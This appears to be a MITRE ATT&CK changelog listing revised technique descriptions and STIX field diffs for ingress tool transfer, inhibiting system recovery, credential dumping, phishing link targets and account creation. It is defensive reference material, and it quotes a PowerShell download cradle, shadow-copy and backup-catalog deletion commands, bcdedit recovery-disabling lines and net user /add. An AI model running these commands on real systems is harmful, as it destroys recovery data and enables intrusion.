Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).   Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)  On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-20 17:38:35.985000+00:00 | 2023-04-14 19:27:57.370000+00:00
description
  Old value: Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
  New value: Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.1 | 2.2
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | Mark Wee
x_mitre_data_sources | | Network Traffic: Network Connection Creation
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Network Traffic: Network Connection Creation |

[T1490] Inhibit System Recovery

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>

New Description

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>
* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system

On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)

New Mitigations:

Dropped Mitigations:

New Detections:

Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-19 23:26:59.186000+00:00 → 2023-04-14 23:09:55.976000+00:00
description (old value): Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
description (new value): Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no * REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations. Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
external_references[1]['source_name']: FireEye WannaCry 2017 → Dark Reading Code Spaces Cyber Attack
external_references[1]['description']: Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. → Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.
external_references[1]['url']: https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html → https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack
external_references[2]['source_name']: Talos Olympic Destroyer 2018 → FireEye WannaCry 2017
external_references[2]['description']: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. → Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
external_references[2]['url']: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html → https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Service: Service Metadata → Command: Command Execution
x_mitre_data_sources[2]: File: File Deletion → Snapshot: Snapshot Deletion
x_mitre_data_sources[4]: Command: Command Execution → Cloud Storage: Cloud Storage Deletion
x_mitre_detection (old value): Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage).
x_mitre_detection (new value): Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit and REAgentC. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage). For network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field: Old value → New value
external_references: (none) → {'source_name': 'Talos Olympic Destroyer 2018', 'description': 'Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.', 'url': 'https://blog.talosintelligence.com/2018/02/olympic-destroyer.html'}
external_references: (none) → {'source_name': 'Rhino Security Labs AWS S3 Ransomware', 'description': 'Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.', 'url': 'https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/'}
external_references: (none) → {'source_name': 'ZDNet Ransomware Backups 2020', 'description': 'Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.', 'url': 'https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/'}
external_references: (none) → {'source_name': 'disable_notif_synology_ransom', 'description': 'TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022.', 'url': 'https://twitter.com/TheDFIRReport/status/1498657590259109894'}
x_mitre_contributors: (none) → Austin Clark, @c2defense
x_mitre_contributors: (none) → Pallavi Sivakumaran
x_mitre_data_sources: (none) → File: File Deletion
x_mitre_data_sources: (none) → Service: Service Metadata
x_mitre_platforms: (none) → Network
x_mitre_platforms: (none) → IaaS

[T1003.001] OS Credential Dumping: LSASS Memory

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-06 16:16:53.388000+00:00 → 2023-04-03 18:54:21.492000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field: Old value → New value
x_mitre_data_sources: (none) → Command: Command Execution
iterable_item_removed
STIX Field: Old value → New value
x_mitre_data_sources: Command: Command Execution → (none)

[T1608.005] Stage Capabilities: Link Target

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)

New Description

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)
Details
dictionary_item_added
STIX Field: Old value → New value
x_mitre_contributors: (none) → ['Goldstein Menachem']
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 20:15:57.855000+00:00 → 2023-04-11 23:20:48.603000+00:00
description (old value): Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)
description (new value): Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)
external_references[3]['source_name']: Malwarebytes Silent Librarian October 2020 → Talos IPFS 2022
external_references[3]['description']: Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021. → Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.
external_references[3]['url']: https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ → https://blog.talosintelligence.com/ipfs-abuse/
external_references[4]['source_name']: Intezer App Service Phishing → Malwarebytes Silent Librarian October 2020
external_references[4]['description']: Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022. → Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.
external_references[4]['url']: https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/ → https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
external_references[5]['source_name']: Proofpoint TA407 September 2019 → Intezer App Service Phishing
external_references[5]['description']: Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021. → Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.
external_references[5]['url']: https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian → https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: Old value → New value
external_references: (none) → {'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'}

[T1087.001] Account Discovery: Local Account

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field: Old value → New value
modified: 2022-08-25 13:04:39.404000+00:00 → 2023-04-13 17:20:22.867000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Process: Process Creation → Command: Command Execution
x_mitre_data_sources[1]: Process: OS API Execution → File: File Access
x_mitre_data_sources[2]: File: File Access → Process: OS API Execution
x_mitre_data_sources[3]: Command: Command Execution → Process: Process Creation
x_mitre_version: 1.3 → 1.4

[T1136.001] Create Account: Local Account

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

New Description

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>.(Citation: cisco_username_cmd)

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Details
dictionary_item_added
STIX Field: Old value → New value
x_mitre_attack_spec_version: (none) → 3.1.0
x_mitre_contributors: (none) → ['Austin Clark, @c2defense']
x_mitre_deprecated: (none) → False
dictionary_item_removed
STIX Field: Old value → New value
x_mitre_permissions_required: ['Administrator'] → (none)
values_changed
STIX Field: Old value → New value
modified: 2021-08-12 13:04:14.248000+00:00 → 2023-04-12 23:23:35.209000+00:00
description (old value): Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
description (new value): Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username.(Citation: cisco_username_cmd) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
external_references[1]['source_name']: Microsoft User Creation Event → cisco_username_cmd
external_references[1]['description']: Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017. → Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.
external_references[1]['url']: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 → https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630
x_mitre_detection (old value): Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.
x_mitre_detection (new value): Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary. For network infrastructure devices, collect AAA logging to monitor for account creations.
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field: Old value → New value
external_references: (none) → {'source_name': 'Microsoft User Creation Event', 'description': 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.', 'url': 'https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720'}
x_mitre_platforms: (none) → Network

[T1078.003] Valid Accounts: Local Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field: Old value → New value
x_mitre_attack_spec_version: (none) → 3.1.0
x_mitre_deprecated: (none) → False
values_changed
STIX Field: Old value → New value
modified: 2021-10-18 17:45:48.323000+00:00 → 2023-04-13 17:17:49.889000+00:00
x_mitre_version: 1.2 → 1.3

[T1069.001] Permission Groups Discovery: Local Groups

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New value
modified: 2022-08-25 13:03:08.484000+00:00 → 2023-04-07 17:14:42.184000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field: Old value → New value
x_mitre_data_sources: (none) → Process: Process Creation
iterable_item_removed
STIX Field: Old value → New value
x_mitre_data_sources: Process: Process Creation → (none)

[T1134.003] Access Token Manipulation: Make and Impersonate Token

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the <code>LogonUser</code> function. The function will return a copy of the new session's access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread.

New Description:
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors: ['Jonny Johnson']
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2020-02-18 18:03:37.481000+00:00 → 2023-04-11 21:22:17.257000+00:00
description:
Old value: Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.
New Value: Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
x_mitre_data_sources[0]: Process: OS API Execution → Command: Command Execution
x_mitre_data_sources[1]: Command: Command Execution → Process: OS API Execution
x_mitre_version: 1.0 → 1.1

[T1204.002] User Execution: Malicious File

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-05-20 17:19:50.801000+00:00 → 2023-04-21 12:22:19.740000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.2 → 1.3

[T1036] Masquerading

Current version: 1.5

Version changed from: 1.4 → 1.5

New Mitigations:

Dropped Mitigations:

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-05-05 04:56:08.978000+00:00 → 2023-04-07 17:04:34.648000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
